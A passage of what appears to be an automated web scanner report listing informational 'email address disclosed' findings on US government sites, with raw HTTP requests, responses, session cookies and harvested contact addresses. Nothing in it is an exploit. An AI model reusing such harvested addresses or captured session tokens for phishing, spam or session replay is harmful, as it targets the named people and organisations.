Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Sun, 07 Feb 2010 03:38:36 GMT
ETag: "3e9f95-8be-47efa6b6be700"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/**
* swapImage - jQuery plugin for swapping image
*
* Copyright (c) 2010 tszming (tszming@gmail.com)
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/
(function(a){a.swapImage=function(c,b,e,f,d){a
...[SNIP]...

22.51. http://in.gov/core/js/portal_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/portal_scripts.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /core/js/portal_scripts.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Wed, 25 Aug 2010 12:02:01 GMT
ETag: "3e9f8e-4a22-48ea4a6334040"
Accept-Ranges: bytes
Content-Length: 18978
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

<!--Slideshow JS -->
/**
*    jquery.slideShow (1.0.6)
*    by Marcel Eichner (www.marceleichner.de)
*    <love@ephigenia.de>
*
*    This simple slideshow plugin will provide your effect gallery with
*    s
...[SNIP]...
ettings.single,data);return data;}}});$.fn.metadata=function(opts){return $.metadata.get(this[0],opts);};})(jQuery);

/**
* swapImage - jQuery plugin for swapping image
* Copyright (c) 2010 tszming (tszming@gmail.com)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/
(function(a){a.swapImage=function(c,b,e,f,d){a.sw
...[SNIP]...

22.52. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://joblink.alabama.gov
Path:   /ada/works/WorkforceCenter.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/works/WorkforceCenter.cfm HTTP/1.1
Host: joblink.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:21:34 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6545172;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d-A65B55C9-2655-1FA7-D4A367D93293FAA3;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFID=6545172;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d%2DA65B55C9%2D2655%2D1FA7%2DD4A367D93293FAA3;path=/
Set-Cookie: TEST=1;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...
<a href="mailto:JobLink@JobLink.Alabama.gov?subject=Alabama JobLink error number 179802">
...[SNIP]...

22.53. http://johncarney.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://johncarney.house.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:38:34 +0000
ETag: "1304123914"
X-Generator: Drupal 7 (http://drupal.org)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 30 Apr 2011 00:38:35 GMT
Date: Sat, 30 Apr 2011 00:38:35 GMT
Connection: close
Content-Length: 49882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
orm-text search-field" gtbfieldid="112" id="edit-signup-theme-form-1" maxlength="128" name="required-valid-email" onfocus="this.value=''" size="15" title="Enter your email address." type="text" value="your@email.com" />
...[SNIP]...

22.54. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://johncarney.house.gov
Path:   /press-release/rep-carney-statement-budget-agreement

Issue detail

The following email address was disclosed in the response:

Request

GET /press-release/rep-carney-statement-budget-agreement HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Referer: http://johncarney.house.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:42:57 +0000
ETag: "1304124177"
Link: </node/257>; rel="shortlink",</press-release/rep-carney-statement-budget-agreement>; rel="canonical"
X-Generator: Drupal 7 (http://drupal.org)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 30 Apr 2011 00:42:58 GMT
Date: Sat, 30 Apr 2011 00:42:58 GMT
Connection: close
Content-Length: 32492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
orm-text search-field" gtbfieldid="112" id="edit-signup-theme-form-1" maxlength="128" name="required-valid-email" onfocus="this.value=''" size="15" title="Enter your email address." type="text" value="your@email.com" />
...[SNIP]...

22.55. http://johncarney.house.gov/profiles/house/themes/house/js/jquery-validation-engine.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://johncarney.house.gov
Path:   /profiles/house/themes/house/js/jquery-validation-engine.js

Issue detail

The following email address was disclosed in the response:

Request

GET /profiles/house/themes/house/js/jquery-validation-engine.js?ljmfa9 HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Referer: http://johncarney.house.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Apr 2011 00:26:23 GMT
ETag: "31f249-6edb-4a0ea177249c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86357
Expires: Sun, 01 May 2011 00:38:00 GMT
Date: Sat, 30 Apr 2011 00:38:43 GMT
Connection: close
Content-Length: 28379

/*
* Inline Form Validation Engine 1.7, jQuery plugin
*
* Copyright(c) 2010, Cedric Dugas
* http://www.position-relative.net
*    
* Form validation engine allowing custom regex rules to be added.
...[SNIP]...
<br />";
                   }    
               }
           }    
           if (callerType == "select-one") { // added by paul@kinetek.net for select boxes, Thank you        
               if(!$(caller).val()) {
                   $.validationEngine.isError = true;
                   promptText += $.validationEngine.settings.allrules[rules[i]].alertText+"<br />";
               }
           }
           if (callerType == "select-multiple") { // added by paul@kinetek.net for select boxes, Thank you    
               if(!$(caller).find("option:selected").val()) {
                   $.validationEngine.isError = true;
                   promptText += $.validationEngine.settings.allrules[rules[i]].alertText+"<br
...[SNIP]...

22.56. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 4246
Content-Type: application/x-javascript
Last-Modified: Fri, 30 May 2008 13:43:34 GMT
ETag: "{7546C43F-4C87-42DC-AD15-FAA69E25486E},19"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
ResourceTag: rt:7546C43F-4C87-42DC-AD15-FAA69E25486E@00000000019
Exires: Fri, 15 Apr 2011 00:36:55 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
Date: Sat, 30 Apr 2011 00:36:55 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.57. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 2838
Content-Type: application/x-javascript
Last-Modified: Fri, 30 May 2008 13:43:34 GMT
ETag: "{E970A592-8652-46D0-8A49-74F742E5C9F0},18"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
ResourceTag: rt:E970A592-8652-46D0-8A49-74F742E5C9F0@00000000018
Exires: Fri, 15 Apr 2011 00:37:02 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
Date: Sat, 30 Apr 2011 00:37:01 GMT

/**
* Purpose: Font sizer class, handles increasing and decreasing font size of a page.
* It increases the font in 10% increments. By getting the level / 10 + 1.

...[SNIP]...
ptions); the two options are
* min and max, for the min level and max level.
* Defaults are min: -3 and max: 5.
*
* Author: Stefan Sedich (stefan.sedich@gmail.com
*/

$jquery = jQuery;

$jquery.FontSizer = {

level: 0,

options : {
min: -3,
max: 5
},

Init : function(optio
...[SNIP]...

22.58. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

Request

GET /SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 4996
Content-Type: application/x-javascript
Last-Modified: Fri, 30 May 2008 13:43:35 GMT
ETag: "{59228E08-CD81-4689-8F36-1E792C227DD4},22"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
ResourceTag: rt:59228E08-CD81-4689-8F36-1E792C227DD4@00000000022
Exires: Fri, 15 Apr 2011 00:37:01 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
Date: Sat, 30 Apr 2011 00:37:01 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.59. http://la.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://la.gov
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: la.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 83409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<!-- begin Home presentation template -->
<html>

<head>
<title>Louisiana.gov - The official w
...[SNIP]...
<a href="mailto:misty.mcafee@la.gov">
...[SNIP]...
<a href="mailto:lclack@ogb.state.la.us">
...[SNIP]...
<a href="mailto:Lsbwdd@bellsouth.net">
...[SNIP]...
<a href="mailto:lastateadvisorycommittee@gmail.com">
...[SNIP]...
<A href="mailto:LAWebmaster@la.gov?subject=Executive Branch Meeting Notice"><STRONG>LAWebmaster@la.gov</STRONG>
...[SNIP]...
<A href="mailto:LAWebmaster@la.gov?subject=Executive Branch Meeting Notice"><STRONG>LAWebmaster@la.gov</STRONG>
...[SNIP]...
<a href="mailto:lawebmaster@la.gov" class="superscript">
...[SNIP]...

22.60. http://la.gov/Government/Boards_and_Commissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://la.gov
Path:   /Government/Boards_and_Commissions/

Issue detail

The following email address was disclosed in the response:

Request

GET /Government/Boards_and_Commissions/ HTTP/1.1
Host: la.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 64202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<!-- begin Government presentation template -->
<html>

<head>
<title>Louisiana.gov - Governme
...[SNIP]...
<a href="mailto:lawebmaster@la.gov" class="superscript">
...[SNIP]...

22.61. http://legis.state.la.us/contact.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /contact.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.htm HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/main.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCAARADRS=JFJCGLCAOPDHMMCLHBDKEGHL; ASPSESSIONIDCAAQBDQT=ONIDGLCADOJCAKFMFOLBBCLG; ASPSESSIONIDCCCTDCRT=EBCKINPCCNNOHGAFIOJDEKPH

Response

HTTP/1.1 200 OK
Content-Length: 5444
Content-Type: text/html
Last-Modified: Wed, 07 Apr 2010 02:32:26 GMT
Accept-Ranges: bytes
ETag: "10c99f8ffad5ca1:107d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:02:48 GMT

<html>
<head>
<title>Contact the Webmasters</title>
<style>a:link { color: #0000ff; text-decoration: none }
a:visited { color: #660099; text-decoration: none }
a:hover { color: #ff0
...[SNIP]...
<a href="mailto:weblegis@legis.state.la.us">
...[SNIP]...
<a href="mailto:webteam@legis.state.la.us">
...[SNIP]...
<a href="mailto:websen@legis.state.la.us">
...[SNIP]...

22.62. http://legis.state.la.us/main.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.state.la.us
Path:   /main.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /main.asp HTTP/1.1
Host: legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 203694
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCTDCRT=NMAKINPCDDLANNNKMKLOBMEG; path=/
Cache-control: private


<HTML>
<HEAD>
<META HTTP-EQUIV=Refresh CONTENT=300>
<TITLE>Louisiana Legislature Home Page</TITLE>
<LINK REL="SHORTCUT ICON" HREF="http://www.legis.state.la.us/images/state.ico">


<script
...[SNIP]...
<a href="mailto:weblegis@legis.state.la.us">
...[SNIP]...

22.63. http://licensingexpress.wordpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://licensingexpress.wordpress.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: licensingexpress.wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:22:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://licensingexpress.wordpress.com/xmlrpc.php
Link: <http://wp.me/wwGt>; rel=shortlink
Content-Length: 39507

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta charset="UTF-8" />
<title> Licensing Express</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" href="http://s2
...[SNIP]...
<a href="mailto:dolnewmedia@dol.wa.gov">
...[SNIP]...

22.64. http://maps.google.com/maps/gx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/gx?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&jsv=310c&vps=1&source=maps_api&callback=_xdc_._6gn3tnggy HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:38 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:38 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 72604

_xdc_._6gn3tnggy && _xdc_._6gn3tnggy({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
al Library",description:"\x3cb\x3eCheaha Regional Library\x3c/b\x3e\x3cbr\x3e935 Coleman Street\x3cbr\x3eHeflin, AL 36264-1313\x3cbr\x3e256-463-7125\x3cbr\x3e256-463-7128\x3cbr\x3e\x3ca href=\"mailto:cheahareglibrary@centurytel.net\" target=\"_blank\"\x3echeahareglibrary@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Cheaha Regional Library",basics:"\x3cdiv
...[SNIP]...
256-463-7125256-4",dscr:"\x3cb\x3eCheaha Regional Library\x3c/b\x3e\x3cbr\x3e935 Coleman Street\x3cbr\x3eHeflin, AL 36264-1313\x3cbr\x3e256-463-7125\x3cbr\x3e256-463-7128\x3cbr\x3e\x3ca href=\"mailto:cheahareglibrary@centurytel.net\" target=\"_blank\"\x3echeahareglibrary@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
brary",description:"\x3cb\x3eLucile L. Morgan Public Library\x3c/b\x3e\x3cbr\x3e541 Ross Street\x3cbr\x3eHeflin, AL 36264-1339\x3cbr\x3e256-463-2259\x3cbr\x3e256-463-2259\x3cbr\x3e\x3ca href=\"mailto:res04jym@gte.net\" target=\"_blank\"\x3eres04jym@gte.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Lucile L. Morgan Public Library",basics:"
...[SNIP]...
256-463-2259",dscr:"\x3cb\x3eLucile L. Morgan Public Library\x3c/b\x3e\x3cbr\x3e541 Ross Street\x3cbr\x3eHeflin, AL 36264-1339\x3cbr\x3e256-463-2259\x3cbr\x3e256-463-2259\x3cbr\x3e\x3ca href=\"mailto:res04jym@gte.net\" target=\"_blank\"\x3eres04jym@gte.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
a Public Library",description:"\x3cb\x3eElba Public Library\x3c/b\x3e\x3cbr\x3e406 Simmons Street\x3cbr\x3eElba, AL 36323-1759\x3cbr\x3e334-897-1759\x3cbr\x3e334-897-6921\x3cbr\x3e\x3ca href=\"mailto:elbalibrary@charter.net\" target=\"_blank\"\x3eelbalibrary@charter.net\x3c/a\x3e",infoWindow:{title:"Elba Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Elba Public Library406 Simmons StreetElba, AL 36323-1759334-897-1759334-897-692",dscr:"\x3cb\x3eElba Public Library\x3c/b\x3e\x3cbr\x3e406 Simmons Street\x3cbr\x3eElba, AL 36323-1759\x3cbr\x3e334-897-1759\x3cbr\x3e334-897-6921\x3cbr\x3e\x3ca href=\"mailto:elbalibrary@charter.net\" target=\"_blank\"\x3eelbalibrary@charter.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.414530,-86.066991\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"D",fid:"ga31955
...[SNIP]...
